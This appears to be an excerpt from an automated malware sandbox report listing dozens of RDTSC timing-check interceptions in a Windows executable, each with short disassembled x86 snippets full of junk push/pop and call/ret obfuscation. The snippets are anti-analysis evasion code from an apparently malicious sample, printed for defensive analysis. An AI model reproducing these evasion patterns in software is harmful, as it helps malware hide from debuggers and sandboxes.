                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CA0F42 second address: CA0F9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F0DD08F41B8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D226Ah], ebx 0x00000028 mov edi, dword ptr [ebp+122D3B70h] 0x0000002e push 00000000h 0x00000030 mov edi, dword ptr [ebp+122D3A54h] 0x00000036 mov edi, edx 0x00000038 push 00000000h 0x0000003a mov ebx, edi 0x0000003c xchg eax, esi 0x0000003d js 00007F0DD08F41BEh 0x00000043 jnc 00007F0DD08F41B8h 0x00000049 push eax 0x0000004a jc 00007F0DD08F41C0h 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CA0165 second address: CA0169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CA211B second address: CA2120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CA0169 second address: CA016F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CA2FF6 second address: CA3011 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD08F41C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CA2120 second address: CA2133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DD1497E6Fh 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CA016F second address: CA0174 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CA2133 second address: CA2137 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CA2137 second address: CA2145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CA2145 second address: CA2149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CA2149 second address: CA21E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD08F41BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0DD08F41C0h 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 popad 0x00000013 nop 0x00000014 or dword ptr [ebp+122D2823h], ecx 0x0000001a push dword ptr fs:[00000000h] 0x00000021 push ebx 0x00000022 or bx, 0F9Ah 0x00000027 pop edi 0x00000028 mov dword ptr fs:[00000000h], esp 0x0000002f mov eax, dword ptr [ebp+122D132Dh] 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007F0DD08F41B8h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 00000015h 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f and ebx, dword ptr [ebp+122D1D07h] 0x00000055 ja 00007F0DD08F41BCh 0x0000005b push FFFFFFFFh 0x0000005d sub dword ptr [ebp+122D35D0h], ecx 0x00000063 nop 0x00000064 jmp 00007F0DD08F41C5h 0x00000069 push eax 0x0000006a push esi 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CA21E1 second address: CA21E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CA3FE9 second address: CA4019 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0DD08F41B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 mov di, F9B7h 0x00000014 push 00000000h 0x00000016 mov ebx, edx 0x00000018 xchg eax, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F0DD08F41C5h 0x00000020 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CA4FDB second address: CA4FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CA4236 second address: CA423C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CA5F95 second address: CA5FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 nop 0x00000007 cld 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F0DD1497E68h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov di, A512h 0x00000028 stc 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007F0DD1497E68h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 0000001Ch 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 or dword ptr [ebp+122D353Eh], ecx 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f jng 00007F0DD1497E66h 0x00000055 push edi 0x00000056 pop edi 0x00000057 popad 0x00000058 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CA521A second address: CA5220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CAFDD5 second address: CAFE12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0DD1497E66h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F0DD1497E6Ah 0x00000013 ja 00007F0DD1497E66h 0x00000019 jne 00007F0DD1497E66h 0x0000001f jno 00007F0DD1497E66h 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F0DD1497E6Ah 0x0000002d jne 00007F0DD1497E66h 0x00000033 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CAFE12 second address: CAFE29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD08F41C3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CAF798 second address: CAF79C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CAF79C second address: CAF7A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CAF7A2 second address: CAF7A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CB3E07 second address: CB3E0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CB3E0D second address: CB3E11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CB3E11 second address: CB3E15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CB3F17 second address: CB3F1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CBAF04 second address: CBAF08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CBAF08 second address: CBAF1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F0DD1497E66h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CBAF1A second address: CBAF1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C3D9BE second address: C3D9CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD1497E6Bh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C3D9CE second address: C3D9D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CB9C60 second address: CB9C7C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jne 00007F0DD1497E66h 0x00000009 jnc 00007F0DD1497E66h 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jns 00007F0DD1497E66h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CBA3C6 second address: CBA3D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F0DD08F41B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CBA779 second address: CBA791 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0DD1497E66h 0x00000008 jbe 00007F0DD1497E66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 ja 00007F0DD1497E6Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CBA791 second address: CBA795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CBA90C second address: CBA912 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CBA912 second address: CBA918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CBADB0 second address: CBADB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CC2455 second address: CC245A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CC245A second address: CC2472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d jc 00007F0DD1497E66h 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CC27CC second address: CC27D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CC2BB7 second address: CC2BBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CC2BBB second address: CC2BD5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0DD08F41B6h 0x00000008 jp 00007F0DD08F41B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jng 00007F0DD08F41B6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CC2BD5 second address: CC2BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CC2E4C second address: CC2E7B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0DD08F41B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F0DD08F41BAh 0x00000014 popad 0x00000015 push ebx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 pop ebx 0x00000019 pushad 0x0000001a push edx 0x0000001b pop edx 0x0000001c jbe 00007F0DD08F41B6h 0x00000022 jg 00007F0DD08F41B6h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C3BEFD second address: C3BF07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C3BF07 second address: C3BF12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CC213E second address: CC2142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CC2142 second address: CC2160 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD08F41C1h 0x00000007 jl 00007F0DD08F41B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CC2160 second address: CC2185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jmp 00007F0DD1497E76h 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F0DD1497E66h 0x00000014 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CC5548 second address: CC554D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C4CCB0 second address: C4CCB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C4CCB4 second address: C4CCBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C4CCBA second address: C4CCEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F0DD1497E66h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F0DD1497E73h 0x00000010 popad 0x00000011 jmp 00007F0DD1497E6Dh 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C4CCEC second address: C4CCF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C4CCF2 second address: C4CCF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C4CCF8 second address: C4CD03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CCAD41 second address: CCAD74 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F0DD1497E66h 0x0000000d js 00007F0DD1497E66h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jmp 00007F0DD1497E72h 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e jno 00007F0DD1497E66h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CCB198 second address: CCB19C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CCB19C second address: CCB1BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F0DD1497E74h 0x0000000f rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CCB1BA second address: CCB1D3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F0DD08F41BAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F0DD08F41B6h 0x00000014 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CCB1D3 second address: CCB20A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0DD1497E77h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F0DD1497E73h 0x00000011 pushad 0x00000012 popad 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CCA7EB second address: CCA800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DD08F41C1h 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CCA800 second address: CCA804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CCB4F6 second address: CCB508 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0DD08F41B8h 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F0DD08F41B6h 0x00000010 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CCB508 second address: CCB50C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CCB674 second address: CCB678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CCB678 second address: CCB680 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CD45CF second address: CD45DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F0DD08F41B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CD45DB second address: CD45DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CD45DF second address: CD4630 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F0DD08F41B8h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007F0DD08F41C7h 0x00000018 jnp 00007F0DD08F41BAh 0x0000001e pushad 0x0000001f popad 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 jmp 00007F0DD08F41BCh 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F0DD08F41BFh 0x0000002e rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CD4630 second address: CD4642 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD1497E6Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CD340A second address: CD3431 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 jmp 00007F0DD08F41BBh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jo 00007F0DD08F41B6h 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f push eax 0x00000020 pop eax 0x00000021 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CD3431 second address: CD3437 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CD3437 second address: CD343D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: CD343D second address: CD3461 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F0DD1497E66h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0DD1497E74h 0x00000015 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C925D0 second address: C92627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 nop 0x00000007 mov ecx, 3FA92D28h 0x0000000c lea eax, dword ptr [ebp+1248736Ch] 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F0DD08F41B8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c nop 0x0000002d jp 00007F0DD08F41C8h 0x00000033 push eax 0x00000034 pushad 0x00000035 pushad 0x00000036 jo 00007F0DD08F41B6h 0x0000003c pushad 0x0000003d popad 0x0000003e popad 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C927DA second address: C927EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F0DD1497E66h 0x00000011 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C927EB second address: C92806 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0DD08F41B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0DD08F41BFh 0x00000011 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C929F9 second address: C92A13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DD1497E76h 0x00000009 rdtsc
